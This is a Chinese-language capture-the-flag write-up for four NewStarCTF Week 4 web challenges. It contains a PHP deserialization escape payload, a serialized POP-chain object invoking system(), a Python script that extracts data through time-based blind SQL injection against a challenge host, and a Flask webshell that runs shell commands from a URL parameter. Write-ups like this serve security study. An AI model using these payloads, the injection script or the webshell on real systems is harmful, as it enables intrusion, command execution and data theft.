NewStarCTF-Week4-Web

逃

查看源码

<?php
highlight_file(__FILE__);
function waf($str){
    return str_replace("bad","good",$str);
}

class GetFlag {
    public $key;
    public $cmd = "whoami";
    public function __construct($key)
    {
        $this->key = $key;
    }
    public function __destruct()
    {
        system($this->cmd);
    }
}

unserialize(waf(serialize(new GetFlag($_GET['key']))));

初步判断是字符串增多逃逸

payload

?key=badbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbadbad";s:3:"cmd";s:9:"cat /flag";}

More Fast

查看源码

<?php
highlight_file(__FILE__);

class Start{
    public $errMsg;
    public function __destruct() {
        die($this->errMsg);
    }
}

class Pwn{
    public $obj;
    public function __invoke(){
        $this->obj->evil();
    }
    public function evil() {
        phpinfo();
    }
}

class Reverse{
    public $func;
    public function __get($var) {
        ($this->func)();
    }
}

class Web{
    public $func;
    public $var;
    public function evil() {
        if(!preg_match("/flag/i",$this->var)){
            ($this->func)($this->var);
        }else{
            echo "Not Flag";
        }
    }
}

class Crypto{
    public $obj;
    public function __toString() {
        $wel = $this->obj->good;
        return "NewStar";
    }
}

class Misc{
    public function evil() {
        echo "good job but nothing";
    }
}

$a = @unserialize($_POST['fast']);
throw new Exception("Nope");

一眼反序列化，直接上payload

<?php
class Start{
    public $errMsg;
    public function __destruct() {
        die($this->errMsg);//errMsg=Crypto
    }
}

class Pwn{
    public $obj;
}

class Reverse{
    public $func;
}

class Web{
    public $func;
    public $var;
}

class Crypto{
    public $obj;
}

class Misc{
}
$web=new Web();
$web->func='system';
$web->var='ls /';
$pwn=new Pwn();
$pwn->obj=$web;
$reserve=new Reverse();
$reserve->func=$pwn;
$crypto=new Crypto();
$crypto->obj=$reserve;
$start=new Start();
$start->errMsg=$crypto;
$b=serialize($start);
print($b);

得到

O:5:"Start":1:{s:6:"errMsg";O:6:"Crypto":1:{s:3:"obj";O:7:"Reverse":1:{s:4:"func";O:3:"Pwn":1:{s:3:"obj";O:3:"Web":2:{s:4:"func";s:6:"system";s:3:"var";s:4:"ls /";}}}}}

因为有异常扔出，所以要提前触发destruct，就去掉最后一个大括号

O:5:"Start":1:{s:6:"errMsg";O:6:"Crypto":1:{s:3:"obj";O:7:"Reverse":1:{s:4:"func";O:3:"Pwn":1:{s:3:"obj";O:3:"Web":2:{s:4:"func";s:6:"system";s:3:"var";s:4:"ls /";}}}}

最后的结果

midsql

经过一系列的测试，最后发现可以用时间盲注

payload

?id=1/**/and/**/if(ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()/**/limit/**/0,1),1,1))>100,sleep(2),sleep(0))

然后就是写脚本进行爆破了

import requests
import time
url='http://0eda0b68-7d6f-42ae-afa3-b6cf506a0cea.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/name/**/from/**/items/**/limit/**/{},1),{},1))/**/like/**/{},sleep(2),sleep(0))'
url1='http://0eda0b68-7d6f-42ae-afa3-b6cf506a0cea.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/name/**/from/**/items/**/limit/**/{},1),{},1))/**/>/**/{},sleep(2),sleep(0))'

text=""


for i in range(10):
    for j in range(1,50):
        print("j=",j)
        min=32
        max=128
        while min < max:
            # print(min,max)
            mid = (min + max) // 2
            flag=0
            start_time=time.time()
            response=requests.get(url.format(i,j,mid))
            end_time=time.time()
            # print("=",end_time-start_time)
            if end_time-start_time>2 :
                text=text+chr(mid)
                print(text)
                flag=1
                break
            start_time = time.time()
            response = requests.get(url1.format(i, j, mid))
            end_time = time.time()
            # print('>',end_time - start_time)
            if end_time-start_time>2 :
                min=mid
            else:
                max=mid

        if flag==0:
            break
    text = text + " "


#http://0eda0b68-7d6f-42ae-afa3-b6cf506a0cea.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/schema_name/**/from/**/information_schema.schemata/**/limit/**/{},1),{},1))/**/like/**/{},sleep(2),sleep(0))爆所有库名
#http://0eda0b68-7d6f-42ae-afa3-b6cf506a0cea.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/'ctf'/**/limit/**/{},1),{},1))/**/like/**/{},sleep(2),sleep(0))爆表名
#http://0eda0b68-7d6f-42ae-afa3-b6cf506a0cea.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name/**/like/**/"items"/**/limit/**/{},1),{},1))/**/like/**/{},sleep(2),sleep(0))爆字段
#http://0eda0b68-7d6f-42ae-afa3-b6cf506a0cea.node4.buuoj.cn:81/?id=1/**/and/**/if(ascii(substr((select/**/name/**/from/**/items/**/limit/**/{},1),{},1))/**/>/**/{},sleep(2),sleep(0))爆字段值

爆破成功

flask disk

题目提示：a flask disk with a vulneribility. (The application is running on port 5000)

打开环境发现flask开启了debug模式，并且我们能够上传文件

考点：flask在开启debug模式下，变更app.py文件会立即加载

写一个rce的app.py,然后上传

from flask import Flask, request
import os

app = Flask(__name__)

@app.route('/')
def index():
    try:
        cmd = request.args.get('cmd')
        data = os.popen(cmd).read()
        return data
    except:
        pass


    return "1"

if __name__ == '__main__':
    app.run(host='0.0.0.0',port=5000,debug=True)